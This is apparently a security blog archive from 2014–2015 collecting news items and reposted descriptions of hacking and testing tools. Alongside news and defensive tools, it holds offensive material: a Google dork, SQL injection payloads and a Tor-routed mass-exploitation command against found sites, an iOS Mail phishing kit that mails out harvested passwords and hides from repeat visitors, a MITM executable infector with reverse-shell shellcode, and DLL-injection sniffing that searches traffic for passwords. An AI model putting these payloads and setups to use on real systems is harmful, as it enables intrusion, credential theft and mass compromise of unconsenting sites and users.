Hackers Can Steal Your Information Through EarPhones

Hackers Can Steal Your Information Through EarPhones..

As we are aware about that Google Voice or Siri are tracking us via our mobile devices so that represents a security risks too.

French Information Security ANSSI research have figured out that how to utilize radio waves to silently trigger voice summons on iPhones or Android devices on the off chance that they utilize headphones and have Google Now or Siri empowered.

Security researchers unveiled that hackers can steal your information to make calls, send texts or browse a Malware website without notifying you. its over 16 feet they can use the attack on your smartphone.

According to Wired,
The researcher utilized the earphones' cord as a radio wire and exploited is wire to change over electromagnetic waves into electrical signals that told the smartphone that orders to be sound are originating from the user microphone.

Earlier, IEEE report was published on the same topic,

Research exploit the principle of front-door coupling on smartphones headphone cables with specific electromagnetic waveforms. We present a smart use of intentional electromagnetic interference, resulting in finer impacts on an information system than a classical denial of service effect. As an outcome, we introduce a new silent remote voice command injection technique on modern smartphones.

How Radio Attack dangerous Silently?

• It can make calls
• To Send text messages
• Browsing Phishing or Malware websites
• Spam Messaging through Social Media Accounts

How this attack works ?
Watch Video:

Read more

by Malik korrich ~ vendredi 16 octobre 2015 0 commentaires

YiSpector First iOS Malware That Attacks On Apple iOS Devices

YiSpector: First iOS Malware That Attacks On Apple iOS Devices

YiSpecter is different from previously seen iOS malware in that it attacks both jailbroken and non-jailbroken iOS devices through unique and harmful malicious behaviors. 

Cyber Security firm Palo Alto networks researcher Claud Xiao defines that, how this malware attack work on iOS devices which targets in China and Taiwan.

He said in the blog,

Specifically, it’s the first malware we’ve seen in the wild that abuses private APIs in the iOS system to implement malicious functionalities.

Yispector Infected iOS device

 YiSpecter is the first real world iOS malware that combines these two attack techniques and causes harm to a wider range of users. It pushes the line barrier of iOS security back another step.

• Whether an iPhone is jailbroken or not, the malware can be successfully downloaded and installed.
• Even if you manually delete the malware, it will automatically re-appear
• Using third-party tools you can find some strange additional “system apps” on infected phones
• On infected phones, in some cases when the user opens a normal app, a full screen advertisement will show.

Palo Alto Networks has released IPS and DNS signatures to block YiSpecter’s malicious traffic. This blog also contains suggestions for how other users can manually remove YiSpecter and avoid potential similar attacks in the future. Apple has also been notified.

According to analysis reports by Qihoo 360 and Cheetah Mobile, YiSpecter was also spread by the Lingdun worm.

A malicious webpage uploaded by Lingdun worm

Lingdun uses fake VeriSign and Symantec certificates to bypass malware detection systems. Its primary goal is to download and to install additional Windows software onto a PC. Most of this additional software is benign but at least one installation was malicious.

Apple said in Statement,

"This issue only impacts users on older versions of iOS who have also downloaded malware from untrusted sources. We addressed this specific issue in iOS 8.4 and we have also blocked the identified apps that distribute this malware. We encourage customers to stay current with the latest version of iOS for the latest security updates. We also encourage them to only download from trusted sources like the App Store and pay attention to any warnings as they download apps.”

How to Remove YiSpecter from Your iOS Devices?

• Go  to Settings –> General –> Profiles and remove all unknown or untrusted profiles.
• Delete any installed apps with names 情涩播放器, 快播私密版 or 快播0.
• You can use any third-party iOS management tool such as iFunBox on Windows or Mac OS X to connect with your iPhone or iPad
• Then check for installed iOS apps like Phone, Weather, Game Center, Passbook, Notes, or Cydia and delete them.

Last month, we reported XcodeGhost malware infected almost 40 popular apps in the Chinese App. Store.

Read more

by Malik korrich ~ mardi 6 octobre 2015 0 commentaires

GitHub Announces To Support Universal 2nd Factor Authentication

GitHub Announces To Support Universal 2nd Factor Authentication (U2F) 
A rapidly growing open authentication standard!

When you insert them, these physical USB keys automatically generates a second-factor code. And you don't even enter a Six-digit code from Google Authentication and similar Apps. GitHub announced that its partnership with Yubico.

Two-factor authentication is a security process in which the user provides two means of identification from separate categories of credentials; one is typically a physical token, such as a card, and the other is typically something memorized, such as a security code.

The FIDO U2F Security Key by Yubico is a specially designed YubiKey, relying on high-security, public-key cryptography. U2F is built to protect against phishing and man-in-the-middle attacks, allowing one U2F authenticator to access any number of services without any shared secrets.

What is U2F — FIDO UNIVERSAL 2ND FACTOR

U2F is an open authentication standard that enables internet users  to securely access any number of online services, with one single device, instantly and with no drivers or client software needed.

U2F was created by Google and Yubico, with contribution from NXP, and is today hosted by the open-authentication industry consortium FIDO Alliance.

U2F is used with USB devices, including YubiKeys, as one of many authentication methods

In order to take advantage of the security improvements provided by U2F, you'll need to purchase a hardware key. You can purchase the U2F key of your choice from a range of vendors. GitHub are partnering with Yubico, inventor of the YubiKey, co-creator of the U2F protocol, and a leading provider of U2F authenticators.

Together with Yubico we are offering discounts to GitHub users for a limited time through a special offer page where you will verify your GitHub account and place your order:

• While supplies last, GitHub users can purchase special edition U2F Security Keys for $5 plus shipping and handling (regular price $18; 5,000 special edition keys available).
• After the special keys are gone, all GitHub users are eligible for a 20% discount on U2F-certified YubiKeys, for a limited time.
• In addition, all students who are eligible for the Student Developer Pack will receive a 20% discount on any U2F-certified YubiKey.

Read more

by Malik korrich ~ vendredi 2 octobre 2015 0 commentaires

PEinjector - MITM Portable Executable (PE) File Infector

PEinjector - MITM Portable Executable (PE) File Infector

The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. 

It creates patches, which are then applied seamlessly during file transfer. It is very performant, lightweight, modular and can be operated on embedded hardware.

Features

• Full x86 and x64 PE file support.
• Open Source
• Fully working on Windows and Linux, including automated installation scripts.
• Can be operated on embedded hardware, tested on a Rasperberry Pi 2.
• On Linux, all servers will be automatically integrated as service, no manual configuration required.
• Plain C, no external libraries required (peinjector).
• MITM integration is available in C, Python and Java. A sample Python MITM implementation is included.
• Foolproof, mobile-ready web interface. Anyone who can configure a home router can configure the injector server.
• Easy to use integrated shellcode factory, including reverse shells, meterpreter, ... or own shellcode. Everything is available in 32 and 64 bit with optional automated encryption. Custom shellcode can be injected directly or as a new thread.

peinjector

Provides PE file patching as a service. Just send the raw header of your PE file and you’ll receive a custom-made patch for it. Can be remotely controlled via a command protocol.

peinjector-control

Web interface to configure and control a peinjector server. A small shellcode factory with some basic shellcodes, automatic encryptoin/obfuscation and thread generation is provided - alternatively, custom shellcode can be injected.

peinjector-interceptor

Sample MITM integration. Based on Python and libmproxy, supports SSL interception, can act as transparent Proxy, HTTP Proxy, ... . Provides seamless PE patching capabilities.

Download

Read more

by Malik korrich ~ lundi 21 septembre 2015 0 commentaires

SniffLab: Setup Your Own MITM, Packet Sniffing WiFi Access Point

Setting up a SNIFFLAB
Scripts to create your own MITM'ing, packet sniffing WiFi access point.

Firewall rules on DD-WRT router to send traffic to MITM proxy box

Make sure the network interface (vlan1 here) is correct.

PROXYIP=your.proxy.ip
iptables -t mangle -A PREROUTING -j ACCEPT -p tcp -m multiport --dports 80,443 -s $PROXYIP
iptables -t mangle -A PREROUTING -j MARK --set-mark 3 -p tcp -m multiport --dports 80,443
ip rule add fwmark 3 table 2
ip route add default via $PROXYIP dev vlan1 table 2

PCAP machine scripts

/etc/network/interfaces

auto lo
iface lo inet loopback
iface eth0 inet manual
iface eth1 inet manual
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

auto bond0
iface bond0 inet dhcp
bond-mode 3
bond-miimon 100
slaves eth0 eth1
/etc/wpa_supplicant/wpa_supplicant.conf

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
        ssid=""
        psk=hashofyourpassword
        proto=RSN
        key_mgmt=WPA-PSK
        pairwise=TKIP
        auth_alg=OPEN
}

Getting the network running correctly on boot

/etc/init.d/network.sh

#!/bin/sh
### BEGIN INIT INFO
# Provides:     network.sh
# Short-Description:    Ensure WiFi as well as Ethernet interfaces are up
# Description:
# Default-Start:    2 3 4 5
# Default-Stop:     0 1 6
# Required-Start:   $remote_fs $syslog
# Required-Stop:    $remote_fs $syslog
### END INIT INFO
sudo ifplugd eth0 --kill
sudo ifup wlan0
sudo ifup eth0
sudo ifup eth1
sudo ifconfig eth1 promisc
sudo ifconfig eth0 promisc
exit 0

Start capturing packets on startup -- create a sniffer service

/etc/init/sniffer.conf

#sniffer.conf
start on runlevel [2345]
stop on runlevel [016]

script
    cd /home/pi/snifflab
    exec python sniffer.py -i bond0 -s 100 -t 1200
end script

MITM proxy service

mitm.conf

start on filesystem

script
    sudo iptables -A PREROUTING -t nat -i em1 -p tcp -m multiport --dports 80,443 -j REDIRECT --to-port 4567
    SSLKEYLOGFILE=/var/log/mitmkeys.log
    export SSLKEYLOGFILE
    echo "MITM Keys being logged here: $SSLKEYLOGFILE"
    exec mitmdump -T --host --conf=/etc/mitmproxy/common.conf
end script

Script to backup pcaps to local machine

#!/bin/bash
remote_server=yourservername
pcap_dir=/pcaps
keylogfile=/var/log/mitmkeys.log
local_dir=~/Documents/snifflab

rsync -a "$remote_server":$pcap_dir $local_dir
scp "$remote_server":$keylogfile $local_dir

Download

Read more

by Malik korrich ~ lundi 17 août 2015 0 commentaires

NetRipper - Smart Traffic Sniffing For Penetration Testers

NetRipper - Smart Traffic Sniffing For Penetration Testers

Description
NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

NetRipper was released at Defcon 23, Las Vegas, Nevada.

Abstract
The post-exploitation activities in a penetration test can be challenging if the tester has low-privileges on a fully patched, well configured Windows machine. This work presents a technique for helping the tester to find useful information by sniffing network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, the encrypted traffic is also captured before being sent to the encryption layer, thus all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper which uses API hooking to do the actions mentioned above and which has been especially designed to be used in penetration tests, but the concept can also be used to monitor network traffic of employees or to analyze a malicious application.

Tested applications
NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications but other tools may require special support.

Components
NetRipper.exe - Configures and inject the DLL
DLL.dll       - Injected DLL, hook APIs and save data to files
netripper.rb  - Metasploit post-exploitation module

Command line
Injection: NetRipper.exe DLLpath.dll processname.exe  
Example:   NetRipper.exe DLL.dll firefox.exe

Generate DLL:

  -h,  --help          Print this help message
  -w,  --write         Full path for the DLL to write the configuration data
  -l,  --location      Full path where to save data files (default TEMP)

Plugins:

   -p,  --plaintext     Capture only plain-text data. E.g. true  
 -d,  --datalimit     Limit capture size per request. E.g. 4096  
 -s,  --stringfinder  Find specific strings. E.g. user,pass,config  

Example:
NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass  

Metasploit module

msf > use post/windows/gather/netripper 
msf post(netripper) > show options

Module options (post/windows/gather/netripper):

   Name          Current Setting                  Required  Description
   ----          ---------------                  --------  -----------
   DATALIMIT     4096                             no        The number of bytes to save from requests/responses
   DATAPATH      TEMP                             no        Where to save files. E.g. C:\Windows\Temp or TEMP
   PLAINTEXT     true                             no        True to save only plain-text data
   PROCESSIDS                                     no        Process IDs. E.g. 1244,1256
   PROCESSNAMES                                   no        Process names. E.g. firefox.exe,chrome.exe
   SESSION                                        yes       The session to run this module on.
   STRINGFINDER  user,login,pass,database,config  no        Search for specific strings in captured data

Set PROCESSNAMES and run.

Metasploit installation (Kali)

• cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
• mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
• g++ -Wall netripper.cpp -o netripper
• cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
• cd ../Release
• cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll
• Plugins
• PlainText - Allows to capture only plain-text data
• DataLimit - Save only first bytes of requests and responses
• Stringinder - Find specific string in network traffic

To do

• Support multiple applications
• Support for x64 processes
• Thread-safe API hooking
• Monitor loading of DLLs and new processes

Author

Ionut Popescu, Senior Security Consultant at KPMG Romania

Download

Read more

by Malik korrich ~ vendredi 14 août 2015 0 commentaires

The Wind: Man In The Middle (MITM) Attack Tool

The Wind: Man In The Middle (MITM) Attack Tool.
To do man in the middle attacks on multiple application layer protocols. 

What is MITM Attack?
A man-in-the-middle (MITM) attack is a form of eavesdropping where communication between two users is monitored and modified by an unauthorized party. Its intercepts a communication between two systems.

For now, it only supports SSL protocol.

• Utilize Scapy to parse packets.
• Utilize Scapy-SSL/TLS to support for parsing/building SSL/TLS in Scapy.

Feature

• SSL Freak Attack

Installation

1) mv ssl_tls.py to ./scapy/layers

2) modify ./scapy/config.py to autoload ssl_tls layer

    config.py::Conf::load_layers 
    375,376c375
    <                    "sebek", "skinny", "smb", "snmp", "tftp", "x509", "bluetooth", "dhcp6", "llmnr", "sctp", "vrrp",
    <                    "ssl_tls", ]
    ---
    >                    "sebek", "skinny", "smb", "snmp", "tftp", "x509", "bluetooth", "dhcp6", "llmnr", "sctp", "vrrp"]

Usage

• redirect traffic to port 8888: iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8888 Or rdr on xxiface inet proto tcp from xxx.xxx.xxx.xxx/xx to any port = 443 -> 127.0.0.1 port 8888
• edit wind.py to import the right file, for example, add import freak to launch the SSL FREAK attack
• you can write your own module to implement a specific ssl attack, the compulsory funtions you need to supply are those in forward.py
• if man in the middle wants to connect to another server, set use OrinAddr = False, then set ip, port
• set doProcess = True to make the process functions take effect.

Download

Read more

by Malik korrich ~ samedi 11 juillet 2015 0 commentaires

Hack iOS Mail App: Exploit Working [Video]

Hack iOS Mail App Credentials: Exploit Working [Video]  
iOS 8.3 Mail app injection kit!

This injection kit pawns every iOS 8.3 Mail app and  it is developed by Jan Soucek. He is exploiting a bug of iOS Mail app that lets hackers send fake prompts to access the password information of the user. So beware of the prompts if you are asked to enter the password and think twice giving your iOS credentials.

Back in January 2015 Jan stumbled upon a bug in iOS's mail client, resulting in HTML tag in e-mail messages not being ignored.

This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password "collector" using simple HTML and CSS.

It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2. Therefore I decided to publish the proof of concept code here.

Demo:


Usage

• Edit the e-mail address you would like to use for password collection in framework.php
• Upload index.php, framework.php and mydata.txt to your server
• Send an e-mail containing HTML code from e-mail.html to the research subject
• Don't forget to change the modal-username GET parameter value to the e-mail address of the recipient
• You can use https://putsmail.com for testing purposes

Credits
Framework7: Vladimir Kharlampidi (http://www.idangero.us/framework7) - Framework7's CSS code was used for the login dialog styling

License
MIT

Notes
The code detects that the research subject has already visited the page in the past (using cookies) and it stops displaying the password prompt to reduce suspicion.

The e-mail address and password are submitted via GET to framework.php, which then saves them to the mydata.txt file, sends them out via e-mail to the specified "collector" e-mail address and then returns the research subject back to Mail.app using redirect to message://dummy.

The password field has autofocus enabled. We then use focus detection to hide the login dialog once the password field loses its focus (e.g. after the subject clicks on OK and submits the password).

Download

Read more

by Malik korrich ~ mercredi 10 juin 2015 0 commentaires

FTPMAP - Advanced Remote FTP Scanner

FTPMAP - Advanced Remote FTP Scanner
Start Hacking FTP Servers? 

Well, this might be a good startup tool!
FTPMAP is the Right Script for you! - It gave's you a lot of valuable information that may aids you in a Security Pentest!

What's it?

Ftpmap scans remote FTP servers to identify what software and what versions they are running. It uses program-specific fingerprints to discover the name of the software even when banners have been changed or removed, or when some features have been disabled. also FTP-Map can detect Vulnerable by the  FTP software/version.

How to compile it?

./configure

make

make install


Usage Commands!

Options:

• -s     - the FTP server.
• -P     - the FTP port (default: 21).
• -u     - FTP user (default: anonymous).
• -u - FTP password (default: NULL). 
• -x      - run command on the FTP server.
• -v            - show version information and quit.
• -h            - show help and quit.

Examples!

ftpmap -s ftp.c9x.org

ftpmap -P 2121 -s 127.0.0.1

ftpmap -u joe -p joepass -s fto.server

ftpmap -u joe -p joepass -s ftp.server -x "SYST"


Download Link:
https://github.com/Hypsurus/ftpmap


About the Author :
Christian Galeone is a Cyber Security Researcher from Italy, he's currently studying to I.I.S.S. Marco Polo ( Vocational Technical Institute | Vo-Tech ) attending the IT Class.
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc. He is currently working with HOC as author of Cyber Security & Critical Tools Research Articles.

Read more

by Malik korrich ~ lundi 1 juin 2015 0 commentaires

Exploring CMS With SQLMap + INURL BR Mass

Exploring CMS With SQLMap + INURL BR Mass

In this article we explore one SQLI pattern in the CMS one of the company. Let's use sqlmap for SQL injection and Scanner INURL to seek mass targets.

For those not familiar with this tool was developed by a HackersOnlineClub member (Cleiton Pinheiro). In order to automate detailed filters with search engines using special digital & security search operators.

[+] Dork:      
intext:"Aadi" & inurl:"page.php?id="

[+] POC:      
http://www.target.com/page.php?id=1+XPL_SQLI

[+] Exploit:
DEBUG: sqlmap  

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1630=1630 AND 'DBoa'='DBoa
Vector: AND [INFERENCE]

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 3932 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(3932=3932,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wUln'='wUln
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(10)))HrzP) AND 'jmET'='jmET
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x465169724a72556d4e4f,0x716a6b7071),NULL-- 

    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL-- 

[+] Login Page: 
http://www.test.com/admin

[+] EXPLORING WITH SQLMAP:
sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2--threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch

OUTPUT PRINT:

[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch"

OUTPUT PRINT:

[+] Discoverer Author: Killer~X
[+] EMAIL:             M_ox@hotmail.com
[+] FACEBOOK:          http://www.fb.com/xXalreshyXx
[+] ASK:               http://www.ask.fm/ALRESHY

Source:
http://www.exploit4arab.net/exploits/1486

Read more

by Malik korrich ~ dimanche 10 mai 2015 0 commentaires

Nuke-IOS An Auditing Tool To Test ARP Attacks For iOS

Nuke-IOS An Auditing Tool To Test ARP Attacks For iOS.

Its an auditing tool to test ARP attacks, can easily be avoided using Static-ARP entries on hosts or with AP isolation. Nuke-IOS (beta) Automated ARP poisoning script for IOS.

What Is ARP Poisoning?
ARP Poisoning attack is a type of attack. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.

ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks.

The attack can only be used on networks that use the Address Resolution Protocol.  Soon its support for SBsettings toggle, yes, one simple button that takes down an entire /24 network in seconds.

Depends on:
mptcp network-cmds

Download

Read more

by Malik korrich ~ mercredi 4 mars 2015 0 commentaires

Nettool.sh - Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks

Nettool.sh  - Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks.

Netool.sh toolkit provides a fast and easy way For new arrivals to IT security pentesting and also to experience users to use allmost all features that the Man-In-The-Middle can provide under local lan, since scanning, sniffing and Social engineering attacks "[spear phishing attacks]"...

Netool its a toolkit written using 'bash, python, ruby' that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. This toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, DoS attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet), also uses macchanger to decoy scans changing the mac address.

Operative Systems Supported are:
Linux-ubuntu, kali-linux, backtack-linux (un-continued), freeBSD, Mac osx (un-continued)

Rootsector module allows you to automate some attacks over DNS_SPOOF + MitM (phishing - social engineering) using metasploit, apache2 and ettercap frameworks. Like the generation of payloads, shellcode, backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage. recent as introducted the scanner inurlbr (by cleiton). This tool brought to you by: peterubuntu10

Video:


Download

Read more

by Malik korrich ~ vendredi 20 février 2015 0 commentaires

NoGoToFail: A Network Security Testing Tool For HTTPS And TLS/SSL Bugs

NoGoToFail: A Network Security Testing Tool For HTTPS and TLS/SSL Bugs. An on-path blackbox network traffic security testing tool.

Nogotofail is a network security testing tool designed to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and applications in a flexible, scalable, powerful way. It includes testing for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping issues, cleartext issues, and more.

Design

Nogotofail is composed of an on-path network MiTM and optional clients for the devices being tested. See docs/design.md for the overview and design goals of nogotofail.

Dependencies

Nogotofail depends only on Python 2.7 and pyOpenSSL>=0.13. The MiTM is designed to work on Linux machines and the transparent traffic capture modes are Linux specific and require iptables as well.

Additionally the Linux client depends on psutil.

According to Google blog,
"Google is committed to increasing the use of TLS/SSL in all applications and services. But “HTTPS everywhere” is not enough; it also needs to be used correctly. Most platforms and devices have secure defaults, but some applications and libraries override the defaults for the worse, and in some instances we’ve seen platforms make mistakes as well. As applications get more complex, connect to more services, and use more third party libraries, it becomes easier to introduce these types of mistakes.

The Android Security Team has built a tool, called nogotofail, that provides an easy way to confirm that the devices or applications you are using are safe against known TLS/SSL vulnerabilities and misconfigurations. Nogotofail works for Android, iOS, Linux, Windows, Chrome OS, OSX, in fact any device you use to connect to the Internet. There’s an easy-to-use client to configure the settings and get notifications on Android and Linux, as well as the attack engine itself which can be deployed as a router, VPN server, or proxy."

Download

Read more

by Malik korrich ~ mardi 9 décembre 2014 0 commentaires

Do you think HTTPS is Secure? But its Not !

Do you think HTTPS is Secure? But its Not !

Do you want to test your Server for BEAST & CRIME Attacks?

Do you want to have an overview on how secure is your encryption also indicating the Supported Suites & Protocols?

TestSSLServer will give you all of them in just one tool!.

All you have to do is visit their main website:

Link: http://www.bolet.org/TestSSLServer/

Then run which package you desire:

-) Java Application

   Link: http://www.bolet.org/TestSSLServer/TestSSLServer.jar

-) Windows Executable Version

   Link: http://www.bolet.org/TestSSLServer/TestSSLServer.exe

Once you will have downloaded it, just drag the app into the Windows Command-Promt and press Enter:

When you are there, you will need to enter the server details, for this use this syntax:

usage: TestSSLServer servername [ port ]

Example: mysubdomain.apple.com 443 **(You can also insert your local address if you have any Server running into it)

As you can see, one of Apple's subdomain is Vulnerable to POODLE Attack since it has SSLv3 Enabled.

It can be attacked from the HTTPS Secure Port - :443 .

We can see that the Vulnerable SSLv3 Cipher Suites are:

RSA_WITH_RC4_128_SHA
RSA_WITH_AES_128_CBC_SHA
RSA_WITH_AES_256_CBC_SHA

...but our Target is also Vulnerable to BEAST Attack as reported below!.

BEAST status: vulnerable

But it's not the end!.

This great Tool also give you relevant informations regarding the Security of your Keys!

My target got it STRONG, it means that a Possible Attacker may concour in some difficulties for Crack the Server Key!.

See Below!:

Minimal encryption strength:    strong encryption (96-bit or more)
Achievable encryption strength: strong encryption (96-bit or more)

If is STRONG, The Hacker may be not facilited but NOT unabilited for CRACK your Web-Server Keys.

At the end, this tool also give you the details about the Security Certificate that the server is running!.

Example mine comes from Cupertino, California!.

Definitively, you should try it at all!.

About the Author :
Christian Galeone is a Cyber Security Researcher from Italy. He has been acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc.

Read more

by Malik korrich ~ mardi 21 octobre 2014 0 commentaires

Snapception: Intercept and Decrypt All Snapchats Received Over Your Network

Snapception: Intercept and decrypt all Snapchats received over your network.


Installing is easy:

pip install snapception 

Starting it is easy too:

snapception --help
Usage: snapception [OPTIONS]

Options:

  -v, --verbose        Enable logging
  -vv, --very-verbose  Include mitmdump in logging
  -o, --output TEXT    Specify output directory (Default is ~/snaps)
  --help               Show this message and exit.

Configuring:

Configure your device to use a proxy pointing to Port 8080 of the host computer
Install a CA on your device by visiting mitm.it once connected to the proxy
Watch all the Snapchats you receive over the network become available on your computer.

Snapception, intercepts all snapchats received over the network so long as the receiving device is connected to the computer running Snapception via a proxy. Those applications also require you to manually login and save your snapchat before officially opening it; Snapception automatically intercepts, decrypts, and saves your received snaps.

Download

Read more

by Malik korrich ~ mardi 14 octobre 2014 0 commentaires